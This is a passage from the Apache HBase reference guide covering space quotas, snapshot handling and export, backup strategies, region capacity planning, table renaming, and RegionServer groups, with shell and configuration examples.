namespace with a quota, the table quota takes priority\nover the namespace quota. This allows for a scenario where a large limit can be placed on\na collection of tables, but a single table in that collection can have a fine-grained limit set.\n\nThe existing `set_quota` and `list_quota` HBase shell commands can be used to interact with\nspace quotas. Space quotas are quotas with a `TYPE` of `SPACE` and have `LIMIT` and `POLICY`\nattributes. The `LIMIT` is a string that refers to the amount of space on the filesystem\nthat the quota subject (e.g. the table or namespace) may consume. For example, valid values\nof `LIMIT` are `'10G'`, `'2T'`, or `'256M'`. The `POLICY` refers to the action that HBase will\ntake when the quota subject's usage exceeds the `LIMIT`. The following are valid `POLICY` values.\n\n* `NO_INSERTS` - No new data may be written (e.g. `Put`, `Increment`, `Append`).\n* `NO_WRITES` - Same as `NO_INSERTS` but `Deletes` are also disallowed.\n* `NO_WRITES_COMPACTIONS` - Same as `NO_WRITES` but compactions are also disallowed.\n* `DISABLE` - The table(s) are disabled, preventing all read\/write access.\n\n.Setting simple space quotas\n----\n# Sets a quota on the table 't1' with a limit of 1GB, disallowing Puts\/Increments\/Appends when the table exceeds 1GB\nhbase> set_quota TYPE => SPACE, TABLE => 't1', LIMIT => '1G', POLICY => NO_INSERTS\n\n# Sets a quota on the namespace 'ns1' with a limit of 50TB, disallowing Puts\/Increments\/Appends\/Deletes\nhbase> set_quota TYPE => SPACE, NAMESPACE => 'ns1', LIMIT => '50T', POLICY => NO_WRITES\n\n# Sets a quota on the table 't3' with a limit of 2TB, disallowing any writes and compactions when the table exceeds 2TB.\nhbase> set_quota TYPE => SPACE, TABLE => 't3', LIMIT => '2T', POLICY => NO_WRITES_COMPACTIONS\n\n# Sets a quota on the table 't2' with a limit of 50GB, disabling the table when it exceeds 50GB\nhbase> set_quota TYPE => SPACE, TABLE => 't2', LIMIT => '50G', POLICY => DISABLE\n----\n\nConsider the following scenario to set up quotas on a namespace, overriding the quota on tables in that namespace\n\n.Table and Namespace space quotas\n----\nhbase> create_namespace 'ns1'\nhbase> create 'ns1:t1'\nhbase> create 'ns1:t2'\nhbase> create 'ns1:t3'\nhbase> set_quota TYPE => SPACE, NAMESPACE => 'ns1', LIMIT => '100T', POLICY => NO_INSERTS\nhbase> set_quota TYPE => SPACE, TABLE => 'ns1:t2', LIMIT => '200G', POLICY => NO_WRITES\nhbase> set_quota TYPE => SPACE, TABLE => 'ns1:t3', LIMIT => '20T', POLICY => NO_WRITES\n----\n\nIn the above scenario, the tables in the namespace `ns1` will not be allowed to consume more than\n100TB of space on the filesystem among each other. The table 'ns1:t2' is only allowed to be 200GB in size, and will\ndisallow all writes when the usage exceeds this limit. The table 'ns1:t3' is allowed to grow to 20TB in size\nand also will disallow all writes then the usage exceeds this limit. Because there is no table quota\non 'ns1:t1', this table can grow up to 100TB, but only if 'ns1:t2' and 'ns1:t3' have a usage of zero bytes.\nPractically, it's limit is 100TB less the current usage of 'ns1:t2' and 'ns1:t3'.\n\n[[ops.space.quota.deletion]]\n=== Disabling Automatic Space Quota Deletion\n\nBy default, if a table or namespace is deleted that has a space quota, the quota itself is\nalso deleted. In some cases, it may be desirable for the space quota to not be automatically deleted.\nIn these cases, the user may configure the system to not delete any space quota automatically via hbase-site.xml.\n\n[source,java]\n----\n\n <property>\n <name>hbase.master.quota.observer.ignore<\/name>\n <value>true<\/value>\n <\/property>\n----\n\n=== HBase Snapshots with Space Quotas\n\nOne common area of unintended-filesystem-use with HBase is via HBase snapshots. Because snapshots\nexist outside of the management of HBase tables, it is not uncommon for administrators to suddenly\nrealize that hundreds of gigabytes or terabytes of space is being used by HBase snapshots which were\nforgotten and never removed.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-17748[HBASE-17748] is the umbrella JIRA issue which\nexpands on the original space quota functionality to also include HBase snapshots. While this is a confusing\nsubject, the implementation attempts to present this support in as reasonable and simple of a manner as\npossible for administrators. This feature does not make any changes to administrator interaction with\nspace quotas, only in the internal computation of table\/namespace usage. Table and namespace usage will\nautomatically incorporate the size taken by a snapshot per the rules defined below.\n\nAs a review, let's cover a snapshot's lifecycle: a snapshot is metadata which points to\na list of HFiles on the filesystem. This is why creating a snapshot is a very cheap operation; no HBase\ntable data is actually copied to perform a snapshot. Cloning a snapshot into a new table or restoring\na table is a cheap operation for the same reason; the new table references the files which already exist\non the filesystem without a copy. To include snapshots in space quotas, we need to define which table\n\"owns\" a file when a snapshot references the file (\"owns\" refers to encompassing the filesystem usage\nof that file).\n\nConsider a snapshot which was made against a table. When the snapshot refers to a file and the table no\nlonger refers to that file, the \"originating\" table \"owns\" that file. When multiple snapshots refer to\nthe same file and no table refers to that file, the snapshot with the lowest-sorting name (lexicographically)\nis chosen and the table which that snapshot was created from \"owns\" that file. HFiles are not \"double-counted\"\n hen a table and one or more snapshots refer to that HFile.\n\nWhen a table is \"rematerialized\" (via `clone_snapshot` or `restore_snapshot`), a similar problem of file\nownership arises. In this case, while the rematerialized table references a file which a snapshot also\nreferences, the table does not \"own\" the file. The table from which the snapshot was created still \"owns\"\nthat file. When the rematerialized table is compacted or the snapshot is deleted, the rematerialized table\nwill uniquely refer to a new file and \"own\" the usage of that file. Similarly, when a table is duplicated via a snapshot\nand `restore_snapshot`, the new table will not consume any quota size until the original table stops referring\nto the files, either due to a compaction on the original table, a compaction on the new table, or the\noriginal table being deleted.\n\nOne new HBase shell command was added to inspect the computed sizes of each snapshot in an HBase instance.\n\n----\nhbase> list_snapshot_sizes\nSNAPSHOT SIZE\n t1.s1 1159108\n----\n\n[[ops.backup]]\n== HBase Backup\n\nThere are two broad strategies for performing HBase backups: backing up with a full cluster shutdown, and backing up on a live cluster.\nEach approach has pros and cons.\n\nFor additional information, see link:http:\/\/blog.sematext.com\/2011\/03\/11\/hbase-backup-options\/[HBase Backup\n Options] over on the Sematext Blog.\n\n[[ops.backup.fullshutdown]]\n=== Full Shutdown Backup\n\nSome environments can tolerate a periodic full shutdown of their HBase cluster, for example if it is being used a back-end analytic capacity and not serving front-end web-pages.\nThe benefits are that the NameNode\/Master are RegionServers are down, so there is no chance of missing any in-flight changes to either StoreFiles or metadata.\nThe obvious con is that the cluster is down.\nThe steps include:\n\n[[ops.backup.fullshutdown.stop]]\n==== Stop HBase\n\n\n\n[[ops.backup.fullshutdown.distcp]]\n==== Distcp\n\nDistcp could be used to either copy the contents of the HBase directory in HDFS to either the same cluster in another directory, or to a different cluster.\n\nNote: Distcp works in this situation because the cluster is down and there are no in-flight edits to files.\nDistcp-ing of files in the HBase directory is not generally recommended on a live cluster.\n\n[[ops.backup.fullshutdown.restore]]\n==== Restore (if needed)\n\nThe backup of the hbase directory from HDFS is copied onto the 'real' hbase directory via distcp.\nThe act of copying these files creates new HDFS metadata, which is why a restore of the NameNode edits from the time of the HBase backup isn't required for this kind of restore, because it's a restore (via distcp) of a specific HDFS directory (i.e., the HBase part) not the entire HDFS file-system.\n\n[[ops.backup.live.replication]]\n=== Live Cluster Backup - Replication\n\nThis approach assumes that there is a second cluster.\nSee the HBase page on link:https:\/\/hbase.apache.org\/book.html#_cluster_replication[replication] for more information.\n\n[[ops.backup.live.copytable]]\n=== Live Cluster Backup - CopyTable\n\nThe <<copy.table,copytable>> utility could either be used to copy data from one table to another on the same cluster, or to copy data to another table on another cluster.\n\nSince the cluster is up, there is a risk that edits could be missed in the copy process.\n\n[[ops.backup.live.export]]\n=== Live Cluster Backup - Export\n\nThe <<export,export>> approach dumps the content of a table to HDFS on the same cluster.\nTo restore the data, the <<import,import>> utility would be used.\n\nSince the cluster is up, there is a risk that edits could be missed in the export process.\n\n[[ops.snapshots]]\n== HBase Snapshots\n\nHBase Snapshots allow you to take a snapshot of a table without too much impact on Region Servers.\nSnapshot, Clone and restore operations don't involve data copying.\nAlso, Exporting the snapshot to another cluster doesn't have impact on the Region Servers.\n\nPrior to version 0.94.6, the only way to backup or to clone a table is to use CopyTable\/ExportTable, or to copy all the hfiles in HDFS after disabling the table.\nThe disadvantages of these methods are that you can degrade region server performance (Copy\/Export Table) or you need to disable the table, that means no reads or writes; and this is usually unacceptable.\n\n[[ops.snapshots.configuration]]\n=== Configuration\n\nTo turn on the snapshot support just set the `hbase.snapshot.enabled` property to true.\n(Snapshots are enabled by default in 0.95+ and off by default in 0.94.6+)\n\n[source,java]\n----\n\n <property>\n <name>hbase.snapshot.enabled<\/name>\n <value>true<\/value>\n <\/property>\n----\n\n[[ops.snapshots.takeasnapshot]]\n=== Take a Snapshot\n\nYou can take a snapshot of a table regardless of whether it is enabled or disabled.\nThe snapshot operation doesn't involve any data copying.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> snapshot 'myTable', 'myTableSnapshot-122112'\n----\n\n.Take a Snapshot Without Flushing\nThe default behavior is to perform a flush of data in memory before the snapshot is taken.\nThis means that data in memory is included in the snapshot.\nIn most cases, this is the desired behavior.\nHowever, if your set-up can tolerate data in memory being excluded from the snapshot, you can use the `SKIP_FLUSH` option of the `snapshot` command to disable and flushing while taking the snapshot.\n\n----\nhbase> snapshot 'mytable', 'snapshot123', {SKIP_FLUSH => true}\n----\n\nWARNING: There is no way to determine or predict whether a very concurrent insert or update will be included in a given snapshot, whether flushing is enabled or disabled.\nA snapshot is only a representation of a table during a window of time.\nThe amount of time the snapshot operation will take to reach each Region Server may vary from a few seconds to a minute, depending on the resource load and speed of the hardware or network, among other factors.\nThere is also no way to know whether a given insert or update is in memory or has been flushed.\n\n[[ops.snapshots.list]]\n=== Listing Snapshots\n\nList all snapshots taken (by printing the names and relative information).\n\n----\n\n$ .\/bin\/hbase shell\nhbase> list_snapshots\n----\n\n[[ops.snapshots.delete]]\n=== Deleting Snapshots\n\nYou can remove a snapshot, and the files retained for that snapshot will be removed if no longer needed.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> delete_snapshot 'myTableSnapshot-122112'\n----\n\n[[ops.snapshots.clone]]\n=== Clone a table from snapshot\n\nFrom a snapshot you can create a new table (clone operation) with the same data that you had when the snapshot was taken.\nThe clone operation, doesn't involve data copies, and a change to the cloned table doesn't impact the snapshot or the original table.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> clone_snapshot 'myTableSnapshot-122112', 'myNewTestTable'\n----\n\n[[ops.snapshots.restore]]\n=== Restore a snapshot\n\nThe restore operation requires the table to be disabled, and the table will be restored to the state at the time when the snapshot was taken, changing both data and schema if required.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> disable 'myTable'\nhbase> restore_snapshot 'myTableSnapshot-122112'\n----\n\nNOTE: Since Replication works at log level and snapshots at file-system level, after a restore, the replicas will be in a different state from the master.\nIf you want to use restore, you need to stop replication and redo the bootstrap.\n\nIn case of partial data-loss due to misbehaving client, instead of a full restore that requires the table to be disabled, you can clone the table from the snapshot and use a Map-Reduce job to copy the data that you need, from the clone to the main one.\n\n[[ops.snapshots.acls]]\n=== Snapshots operations and ACLs\n\nIf you are using security with the AccessController Coprocessor (See <<hbase.accesscontrol.configuration,hbase.accesscontrol.configuration>>), only a global administrator can take, clone, or restore a snapshot, and these actions do not capture the ACL rights.\nThis means that restoring a table preserves the ACL rights of the existing table, while cloning a table creates a new table that has no ACL rights until the administrator adds them.\n\n[[ops.snapshots.export]]\n=== Export to another cluster\n\nThe ExportSnapshot tool copies all the data related to a snapshot (hfiles, logs, snapshot metadata) to another cluster.\nThe tool executes a Map-Reduce job, similar to distcp, to copy files between the two clusters, and since it works at file-system level the hbase cluster does not have to be online.\n\nTo copy a snapshot called MySnapshot to an HBase cluster srv2 (hdfs:\/\/\/srv2:8082\/hbase) using 16 mappers:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16\n----\n\n.Limiting Bandwidth Consumption\nYou can limit the bandwidth consumption when exporting a snapshot, by specifying the `-bandwidth` parameter, which expects an integer representing megabytes per second.\nThe following example limits the above example to 200 MB\/sec.\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16 -bandwidth 200\n----\n\n[[snapshots_s3]]\n=== Storing Snapshots in an Amazon S3 Bucket\n\nYou can store and retrieve snapshots from Amazon S3, using the following procedure.\n\nNOTE: You can also store snapshots in Microsoft Azure Blob Storage. See <<snapshots_azure>>.\n\n.Prerequisites\n- You must be using HBase 1.0 or higher and Hadoop 2.6.1 or higher, which is the first\nconfiguration that uses the Amazon AWS SDK.\n- You must use the `s3a:\/\/` protocol to connect to Amazon S3. The older `s3n:\/\/`\nand `s3:\/\/` protocols have various limitations and do not use the Amazon AWS SDK.\n- The `s3a:\/\/` URI must be configured and available on the server where you run\nthe commands to export and restore the snapshot.\n\nAfter you have fulfilled the prerequisites, take the snapshot like you normally would.\nAfterward, you can export it using the `org.apache.hadoop.hbase.snapshot.ExportSnapshot`\ncommand like the one below, substituting your own `s3a:\/\/` path in the `copy-from`\nor `copy-to` directive and substituting or modifying other options as required:\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot \\\n -copy-from hdfs:\/\/srv2:8082\/hbase \\\n -copy-to s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot\n -copy-from s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -copy-to hdfs:\/\/srv2:8082\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\nYou can also use the `org.apache.hadoop.hbase.snapshot.SnapshotInfo` utility with the `s3a:\/\/` path by including the\n`-remote-dir` option.\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.SnapshotInfo \\\n -remote-dir s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -list-snapshots\n----\n\n[[snapshots_azure]]\n== Storing Snapshots in Microsoft Azure Blob Storage\n\nYou can store snapshots in Microsoft Azure Blog Storage using the same techniques\nas in <<snapshots_s3>>.\n\n.Prerequisites\n- You must be using HBase 1.2 or higher with Hadoop 2.7.1 or\n higher. No version of HBase supports Hadoop 2.7.0.\n- Your hosts must be configured to be aware of the Azure blob storage filesystem.\n See https:\/\/hadoop.apache.org\/docs\/r2.7.1\/hadoop-azure\/index.html.\n\nAfter you meet the prerequisites, follow the instructions\nin <<snapshots_s3>>, replacingthe protocol specifier with `wasb:\/\/` or `wasbs:\/\/`.\n\n[[ops.capacity]]\n== Capacity Planning and Region Sizing\n\nThere are several considerations when planning the capacity for an HBase cluster and performing the initial configuration.\nStart with a solid understanding of how HBase handles data internally.\n\n[[ops.capacity.nodes]]\n=== Node count and hardware\/VM configuration\n\n[[ops.capacity.nodes.datasize]]\n==== Physical data size\n\nPhysical data size on disk is distinct from logical size of your data and is affected by the following:\n\n* Increased by HBase overhead\n+\n* See <<keyvalue,keyvalue>> and <<keysize,keysize>>.\n At least 24 bytes per key-value (cell), can be more.\n Small keys\/values means more relative overhead.\n* KeyValue instances are aggregated into blocks, which are indexed.\n Indexes also have to be stored.\n Blocksize is configurable on a per-ColumnFamily basis.\n See <<regions.arch,regions.arch>>.\n\n* Decreased by <<compression,compression>> and data block encoding, depending on data.\n See also link:http:\/\/search-hadoop.com\/m\/lL12B1PFVhp1[this thread].\n You might want to test what compression and encoding (if any) make sense for your data.\n* Increased by size of region server <<wal,wal>> (usually fixed and negligible - less than half of RS memory size, per RS).\n* Increased by HDFS replication - usually x3.\n\nAside from the disk space necessary to store the data, one RS may not be able to serve arbitrarily large amounts of data due to some practical limits on region count and size (see <<ops.capacity.regions,ops.capacity.regions>>).\n\n[[ops.capacity.nodes.throughput]]\n==== Read\/Write throughput\n\nNumber of nodes can also be driven by required throughput for reads and\/or writes.\nThe throughput one can get per node depends a lot on data (esp.\nkey\/value sizes) and request patterns, as well as node and system configuration.\nPlanning should be done for peak load if it is likely that the load would be the main driver of the increase of the node count.\nPerformanceEvaluation and <<ycsb,ycsb>> tools can be used to test single node or a test cluster.\n\nFor write, usually 5-15Mb\/s per RS can be expected, since every region server has only one active WAL.\nThere's no good estimate for reads, as it depends vastly on data, requests, and cache hit rate. <<perf.casestudy,perf.casestudy>> might be helpful.\n\n[[ops.capacity.nodes.gc]]\n==== JVM GC limitations\n\nRS cannot currently utilize very large heap due to cost of GC.\nThere's also no good way of running multiple RS-es per server (other than running several VMs per machine). Thus, ~20-24Gb or less memory dedicated to one RS is recommended.\nGC tuning is required for large heap sizes.\nSee <<gcpause,gcpause>>, <<trouble.log.gc,trouble.log.gc>> and elsewhere (TODO: where?)\n\n[[ops.capacity.regions]]\n=== Determining region count and size\n\nGenerally less regions makes for a smoother running cluster (you can always manually split the big regions later (if necessary) to spread the data, or request load, over the cluster); 20-200 regions per RS is a reasonable range.\nThe number of regions cannot be configured directly (unless you go for fully <<disable.splitting,disable.splitting>>); adjust the region size to achieve the target region size given table size.\n\nWhen configuring regions for multiple tables, note that most region settings can be set on a per-table basis via link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HTableDescriptor.html[HTableDescriptor], as well as shell commands.\nThese settings will override the ones in `hbase-site.xml`.\nThat is useful if your tables have different workloads\/use cases.\n\nAlso note that in the discussion of region sizes here, _HDFS replication factor is not (and should not be) taken into account, whereas\n other factors <<ops.capacity.nodes.datasize,ops.capacity.nodes.datasize>> should be._ So, if your data is compressed and replicated 3 ways by HDFS, \"9 Gb region\" means 9 Gb of compressed data.\nHDFS replication factor only affects your disk usage and is invisible to most HBase code.\n\n==== Viewing the Current Number of Regions\n\nYou can view the current number of regions for a given table using the HMaster UI.\nIn the [label]#Tables# section, the number of online regions for each table is listed in the [label]#Online Regions# column.\nThis total only includes the in-memory state and does not include disabled or offline regions.\nIf you do not want to use the HMaster UI, you can determine the number of regions by counting the number of subdirectories of the \/hbase\/<table>\/ subdirectories in HDFS, or by running the `bin\/hbase hbck` command.\nEach of these methods may return a slightly different number, depending on the status of each region.\n\n[[ops.capacity.regions.count]]\n==== Number of regions per RS - upper bound\n\nIn production scenarios, where you have a lot of data, you are normally concerned with the maximum number of regions you can have per server. <<too_many_regions,too many regions>> has technical discussion on the subject.\nBasically, the maximum number of regions is mostly determined by memstore memory usage.\nEach region has its own memstores; these grow up to a configurable size; usually in 128-256 MB range, see <<hbase.hregion.memstore.flush.size,hbase.hregion.memstore.flush.size>>.\nOne memstore exists per column family (so there's only one per region if there's one CF in the table). The RS dedicates some fraction of total memory to its memstores (see <<hbase.regionserver.global.memstore.size,hbase.regionserver.global.memstore.size>>). If this memory is exceeded (too much memstore usage), it can cause undesirable consequences such as unresponsive server or compaction storms.\nA good starting point for the number of regions per RS (assuming one table) is:\n\n[source]\n----\n((RS memory) * (total memstore fraction)) \/ ((memstore size)*(# column families))\n----\n\nThis formula is pseudo-code.\nHere are two formulas using the actual tunable parameters, first for HBase 0.98+ and second for HBase 0.94.x.\n\nHBase 0.98.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.size) \/ (hbase.hregion.memstore.flush.size * (# column families))\n----\nHBase 0.94.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.upperLimit) \/ (hbase.hregion.memstore.flush.size * (# column families))+\n----\n\nIf a given RegionServer has 16 GB of RAM, with default settings, the formula works out to 16384*0.4\/128 ~ 51 regions per RS is a starting point.\nThe formula can be extended to multiple tables; if they all have the same configuration, just use the total number of families.\n\nThis number can be adjusted; the formula above assumes all your regions are filled at approximately the same rate.\nIf only a fraction of your regions are going to be actively written to, you can divide the result by that fraction to get a larger region count.\nThen, even if all regions are written to, all region memstores are not filled evenly, and eventually jitter appears even if they are (due to limited number of concurrent flushes). Thus, one can have as many as 2-3 times more regions than the starting point; however, increased numbers carry increased risk.\n\nFor write-heavy workload, memstore fraction can be increased in configuration at the expense of block cache; this will also allow one to have more regions.\n\n[[ops.capacity.regions.mincount]]\n==== Number of regions per RS - lower bound\n\nHBase scales by having regions across many servers.\nThus if you have 2 regions for 16GB data, on a 20 node machine your data will be concentrated on just a few machines - nearly the entire cluster will be idle.\nThis really can't be stressed enough, since a common problem is loading 200MB data into HBase and then wondering why your awesome 10 node cluster isn't doing anything.\n\nOn the other hand, if you have a very large amount of data, you may also want to go for a larger number of regions to avoid having regions that are too large.\n\n[[ops.capacity.regions.size]]\n==== Maximum region size\n\nFor large tables in production scenarios, maximum region size is mostly limited by compactions - very large compactions, esp.\nmajor, can degrade cluster performance.\nCurrently, the recommended maximum region size is 10-20Gb, and 5-10Gb is optimal.\nFor older 0.90.x codebase, the upper-bound of regionsize is about 4Gb, with a default of 256Mb.\n\nThe size at which the region is split into two is generally configured via <<hbase.hregion.max.filesize,hbase.hregion.max.filesize>>; for details, see <<arch.region.splits,arch.region.splits>>.\n\nIf you cannot estimate the size of your tables well, when starting off, it's probably best to stick to the default region size, perhaps going smaller for hot tables (or manually split hot regions to spread the load over the cluster), or go with larger region sizes if your cell sizes tend to be largish (100k and up).\n\nIn HBase 0.98, experimental stripe compactions feature was added that would allow for larger regions, especially for log data.\nSee <<ops.stripe,ops.stripe>>.\n\n[[ops.capacity.regions.total]]\n==== Total data size per region server\n\nAccording to above numbers for region size and number of regions per region server, in an optimistic estimate 10 GB x 100 regions per RS will give up to 1TB served per region server, which is in line with some of the reported multi-PB use cases.\nHowever, it is important to think about the data vs cache size ratio at the RS level.\nWith 1TB of data per server and 10 GB block cache, only 1% of the data will be cached, which may barely cover all block indices.\n\n[[ops.capacity.config]]\n=== Initial configuration and tuning\n\nFirst, see <<important_configurations,important configurations>>.\nNote that some configurations, more than others, depend on specific scenarios.\nPay special attention to:\n\n* <<hbase.regionserver.handler.count,hbase.regionserver.handler.count>> - request handler thread count, vital for high-throughput workloads.\n* <<config.wals,config.wals>> - the blocking number of WAL files depends on your memstore configuration and should be set accordingly to prevent potential blocking when doing high volume of writes.\n\nThen, there are some considerations when setting up your cluster and tables.\n\n[[ops.capacity.config.compactions]]\n==== Compactions\n\nDepending on read\/write volume and latency requirements, optimal compaction settings may be different.\nSee <<compaction,compaction>> for some details.\n\nWhen provisioning for large data sizes, however, it's good to keep in mind that compactions can affect write throughput.\nThus, for write-intensive workloads, you may opt for less frequent compactions and more store files per regions.\nMinimum number of files for compactions (`hbase.hstore.compaction.min`) can be set to higher value; <<hbase.hstore.blockingStoreFiles,hbase.hstore.blockingStoreFiles>> should also be increased, as more files might accumulate in such case.\nYou may also consider manually managing compactions: <<managed.compactions,managed.compactions>>\n\n[[ops.capacity.config.presplit]]\n==== Pre-splitting the table\n\nBased on the target number of the regions per RS (see <<ops.capacity.regions.count,ops.capacity.regions.count>>) and number of RSes, one can pre-split the table at creation time.\nThis would both avoid some costly splitting as the table starts to fill up, and ensure that the table starts out already distributed across many servers.\n\nIf the table is expected to grow large enough to justify that, at least one region per RS should be created.\nIt is not recommended to split immediately into the full target number of regions (e.g.\n50 * number of RSes), but a low intermediate value can be chosen.\nFor multiple tables, it is recommended to be conservative with presplitting (e.g.\npre-split 1 region per RS at most), especially if you don't know how much each table will grow.\nIf you split too much, you may end up with too many regions, with some tables having too many small regions.\n\nFor pre-splitting howto, see <<manual_region_splitting_decisions,manual region splitting decisions>> and <<precreate.regions,precreate.regions>>.\n\n[[table.rename]]\n== Table Rename\n\nIn versions 0.90.x of hbase and earlier, we had a simple script that would rename the hdfs table directory and then do an edit of the hbase:meta table replacing all mentions of the old table name with the new.\nThe script was called `.\/bin\/rename_table.rb`.\nThe script was deprecated and removed mostly because it was unmaintained and the operation performed by the script was brutal.\n\nAs of hbase 0.94.x, you can use the snapshot facility renaming a table.\nHere is how you would do it using the hbase shell:\n\n----\nhbase shell> disable 'tableName'\nhbase shell> snapshot 'tableName', 'tableSnapshot'\nhbase shell> clone_snapshot 'tableSnapshot', 'newTableName'\nhbase shell> delete_snapshot 'tableSnapshot'\nhbase shell> drop 'tableName'\n----\n\nor in code it would be as follows:\n\n[source,java]\n----\nvoid rename(Admin admin, String oldTableName, TableName newTableName) {\n String snapshotName = randomName();\n admin.disableTable(oldTableName);\n admin.snapshot(snapshotName, oldTableName);\n admin.cloneSnapshot(snapshotName, newTableName);\n admin.deleteSnapshot(snapshotName);\n admin.deleteTable(oldTableName);\n}\n----\n\n[[rsgroup]]\n== RegionServer Grouping\nRegionServer Grouping (A.K.A `rsgroup`) is an advanced feature for\npartitioning regionservers into distinctive groups for strict isolation. It\nshould only be used by users who are sophisticated enough to understand the\nfull implications and have a sufficient background in managing HBase clusters.\nIt was developed by Yahoo! and they run it at scale on their large grid cluster.\nSee link:http:\/\/www.slideshare.net\/HBaseCon\/keynote-apache-hbase-at-yahoo-scale[HBase at Yahoo! Scale].\n\nRSGroups can be defined and managed with shell commands or corresponding Java\nAPIs. A server can be added to a group with hostname and port pair and tables\ncan be moved to this group so that only regionservers in the same rsgroup can\nhost the regions of the table. RegionServers and tables can only belong to one\nrsgroup at a time. By default, all tables and regionservers belong to the\n`default` rsgroup. System tables can also be put into a rsgroup using the regular\nAPIs. A custom balancer implementation tracks assignments per rsgroup and makes\nsure to move regions to the relevant regionservers in that rsgroup. The rsgroup\ninformation is stored in a regular HBase table, and a zookeeper-based read-only\ncache is used at cluster bootstrap time.\n\nTo enable, add the following to your hbase-site.xml and restart your Master:\n\n[source,xml]\n----\n <property>\n <name>hbase.coprocessor.master.classes<\/name>\n <value>org.apache.hadoop.hbase.rsgroup.RSGroupAdminEndpoint<\/value>\n <\/property>\n <property>\n <name>hbase.master.loadbalancer.class<\/name>\n <value>org.apache.hadoop.hbase.rsgroup.RSGroupBasedLoadBalancer<\/value>\n <\/property>\n----\n\nThen use the shell _rsgroup_ commands to create and manipulate RegionServer\ngroups: e.g. to add a rsgroup and then add a server to it. To see the list of\nrsgroup commands available in the hbase shell type:\n\n[source, bash]\n----\n hbase(main):008:0> help \u2018rsgroup\u2019\n Took 0.5610 seconds\n----\n\nHigh level, you create a rsgroup that is other than the `default` group using\n_add_rsgroup_ command. You then add servers and tables to this group with the\n_move_servers_rsgroup_ and _move_tables_rsgroup_ commands. If necessary, run\na balance for the group if tables are slow to migrate to the groups dedicated\nserver with the _balance_rsgroup_ command (Usually this is not needed). To\nmonitor effect of the commands, see the `Tables` tab toward the end of the\nMaster UI home page. If you click on a table, you can see what servers it is\ndeployed across. You should see here a reflection of the grouping done with\nyour shell commands. View the master log if issues.\n\nHere is example using a few of the rsgroup commands. To add a group, do as follows:\n\n[source, bash]\n----\n hbase(main):008:0> add_rsgroup 'my_group'\n Took 0.5610 seconds\n----\n\n\n.RegionServer Groups must be Enabled\n[NOTE]\n====\nIf you have not enabled the rsgroup Coprocessor Endpoint in the master and\nyou run the any of the rsgroup shell commands, you will see an error message\nlike the below:\n\n[source,java]\n----\nERROR: org.apache.hadoop.hbase.exceptions.UnknownProtocolException: No registered master coprocessor service found for name RSGroupAdminService\n at org.apache.hadoop.hbase.master.MasterRpcServices.execMasterService(MasterRpcServices.java:604)\n at org.apache.hadoop.hbase.shaded.protobuf.generated.MasterProtos$MasterService$2.callBlockingMethod(MasterProtos.java)\n at org.apache.hadoop.hbase.ipc.RpcServer.call(RpcServer.java:1140)\n at org.apache.hadoop.hbase.ipc.CallRunner.run(CallRunner.java:133)\n at org.apache.hadoop.hbase.ipc.RpcExecutor$Handler.run(RpcExecutor.java:277)\n at org.apache.hadoop.hbase.ipc.RpcExecutor$Handler.run(RpcExecutor.java:257)\n----\n====\n\nAdd a server (specified by hostname + port) to the just-made group using the\n_move_servers_rsgroup_ command as follows:\n\n[source, bash]\n----\n hbase(main):010:0> move_servers_rsgroup 'my_group',['k.att.net:51129']\n----\n\n.Hostname and Port vs ServerName\n[NOTE]\n====\nThe rsgroup feature refers to servers in a cluster with hostname and port only.\nIt does not make use of the HBase ServerName type identifying RegionServers;\ni.e. hostname + port + starttime to distinguish RegionServer instances. The\nrsgroup feature keeps working across RegionServer restarts so the starttime of\nServerName -- and hence the ServerName type -- is not appropriate.\nAdministration\n====\n\nServers come and go over the lifetime of a Cluster. Currently, you must\nmanually align the servers referenced in rsgroups with the actual state of\nnodes in the running cluster. What we mean by this is that if you decommission\na server, then you must update rsgroups as part of your server decommission\nprocess removing references.\n\nBut, there is no _remove_offline_servers_rsgroup_command you say!\n\nThe way to remove a server is to move it to the `default` group. The `default`\ngroup is special. All rsgroups, but the `default` rsgroup, are static in that\nedits via the shell commands are persisted to the system `hbase:rsgroup` table.\nIf they reference a decommissioned server, then they need to be updated to undo\nthe reference.\n\nThe `default` group is not like other rsgroups in that it is dynamic. Its server\nlist mirrors the current state of the cluster; i.e. if you shutdown a server that\nwas part of the `default` rsgroup, and then do a _get_rsgroup_ `default` to list\nits content in the shell, the server will no longer be listed. For non-`default`\ngroups, though a mode may be offline, it will persist in the non-`default` group\u2019s\nlist of servers. But if you move the offline server from the non-default rsgroup\nto default, it will not show in the `default` list. It will just be dropped.\n\n=== Best Practice\nThe authors of the rsgroup feature, the Yahoo! HBase Engineering team, have been\nrunning it on their grid for a good while now and have come up with a few best\npractices informed by their experience.\n\n==== Isolate System Tables\nEither have a system rsgroup where all the system tables are or just leave the\nsystem tables in `default` rsgroup and have all user-space tables are in\nnon-`default` rsgroups.\n\n==== Dead Nodes\nYahoo! Have found it useful at their scale to keep a special rsgroup of dead or\nquestionable nodes; this is one means of keeping them out of the running until repair.\n\nBe careful replacing dead nodes in an rsgroup. Ensure there are enough live nodes\nbefore you start moving out the dead. Move in good live nodes first if you have to.\n\n=== Troubleshooting\nViewing the Master log will give you insight on rsgroup operation.\n\nIf it appears stuck, restart the Master 